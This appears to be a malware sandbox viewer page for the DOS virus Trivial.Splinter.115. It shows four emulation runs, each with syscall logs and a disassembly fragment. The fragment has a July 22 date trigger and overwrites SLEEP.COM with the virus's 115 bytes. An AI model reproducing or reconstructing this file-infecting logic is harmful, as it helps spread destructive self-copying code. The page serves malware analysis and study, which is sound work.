Sample viewer

vx.netlux.org/Virus.DOS.Trivial.Splinter.115

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:32:31.044072691Z	42	PC: 12a44 \| Get date 0x12a44: cmp dl, 0x16 0x12a47: jne 0x12a57 0x12a49: cmp dh, 7 0x12a4c: jne 0x12a57 0x12a4e: mov ah, 9 0x12a50: mov dx, 0x157 0x12a53: int 0x21 0x12a55: int 0x20 0x12a57: mov ah, 0x4e 0x12a59: mov cx, 0 0x12a5c: mov dx, 0x142 0x12a5f: int 0x21 0x12a61: mov ah, 0x3d 0x12a63: mov al, 2 0x12a65: mov dx, 0x9e 0x12a68: int 0x21 0x12a6a: xchg ax, bx 0x12a6b: mov ah, 0x40 0x12a6d: mov cx, 0x73 0x12a70: mov dx, 0x100
2018-12-17T22:32:31.046726298Z	78	PC: 12a61 \| Find first file
2018-12-17T22:32:31.05175033Z	61	PC: 12a6a \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:31.056783407Z	64	PC: 12a75 \| Write file or device (Write 115 bytes on handle 5)
2018-12-17T22:32:31.06270595Z	62	PC: 12a79 \| Close file
2018-12-17T22:32:31.087480836Z	9	PC: 12a80 \| Display string (String= 'Out of Memory!')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5811,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:55:25.948773657Z	42	PC: 12a44 \| Get date 0x12a44: cmp dl, 0x16 0x12a47: jne 0x12a57 0x12a49: cmp dh, 7 0x12a4c: jne 0x12a57 0x12a4e: mov ah, 9 0x12a50: mov dx, 0x157 0x12a53: int 0x21 0x12a55: int 0x20 0x12a57: mov ah, 0x4e 0x12a59: mov cx, 0 0x12a5c: mov dx, 0x142 0x12a5f: int 0x21 0x12a61: mov ah, 0x3d 0x12a63: mov al, 2 0x12a65: mov dx, 0x9e 0x12a68: int 0x21 0x12a6a: xchg ax, bx 0x12a6b: mov ah, 0x40 0x12a6d: mov cx, 0x73 0x12a70: mov dx, 0x100
2018-12-25T11:55:25.962315069Z	78	PC: 12a61 \| Find first file
2018-12-25T11:55:25.968700824Z	61	PC: 12a6a \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:25.975022063Z	64	PC: 12a75 \| Write file or device (Write 115 bytes on handle 5)
2018-12-25T11:55:25.982779946Z	62	PC: 12a79 \| Close file
2018-12-25T11:55:26.057115285Z	9	PC: 12a80 \| Display string (String= 'Out of Memory!')

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5811,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:55:26.025728906Z	42	PC: 12a44 \| Get date 0x12a44: cmp dl, 0x16 0x12a47: jne 0x12a57 0x12a49: cmp dh, 7 0x12a4c: jne 0x12a57 0x12a4e: mov ah, 9 0x12a50: mov dx, 0x157 0x12a53: int 0x21 0x12a55: int 0x20 0x12a57: mov ah, 0x4e 0x12a59: mov cx, 0 0x12a5c: mov dx, 0x142 0x12a5f: int 0x21 0x12a61: mov ah, 0x3d 0x12a63: mov al, 2 0x12a65: mov dx, 0x9e 0x12a68: int 0x21 0x12a6a: xchg ax, bx 0x12a6b: mov ah, 0x40 0x12a6d: mov cx, 0x73 0x12a70: mov dx, 0x100
2018-12-25T11:55:26.031255484Z	78	PC: 12a61 \| Find first file
2018-12-25T11:55:26.037129415Z	61	PC: 12a6a \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:26.043508823Z	64	PC: 12a75 \| Write file or device (Write 115 bytes on handle 5)
2018-12-25T11:55:26.051210367Z	62	PC: 12a79 \| Close file
2018-12-25T11:55:26.064456552Z	9	PC: 12a80 \| Display string (String= 'Out of Memory!')

{"DateBased":true,"Day":22,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5811,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:55:26.656966161Z	42	PC: 12a44 \| Get date 0x12a44: cmp dl, 0x16 0x12a47: jne 0x12a57 0x12a49: cmp dh, 7 0x12a4c: jne 0x12a57 0x12a4e: mov ah, 9 0x12a50: mov dx, 0x157 0x12a53: int 0x21 0x12a55: int 0x20 0x12a57: mov ah, 0x4e 0x12a59: mov cx, 0 0x12a5c: mov dx, 0x142 0x12a5f: int 0x21 0x12a61: mov ah, 0x3d 0x12a63: mov al, 2 0x12a65: mov dx, 0x9e 0x12a68: int 0x21 0x12a6a: xchg ax, bx 0x12a6b: mov ah, 0x40 0x12a6d: mov cx, 0x73 0x12a70: mov dx, 0x100
2018-12-25T11:55:26.660042569Z	9	PC: 12a55 \| Display string (String= 'Splinter 1 Virus EXE-Gency')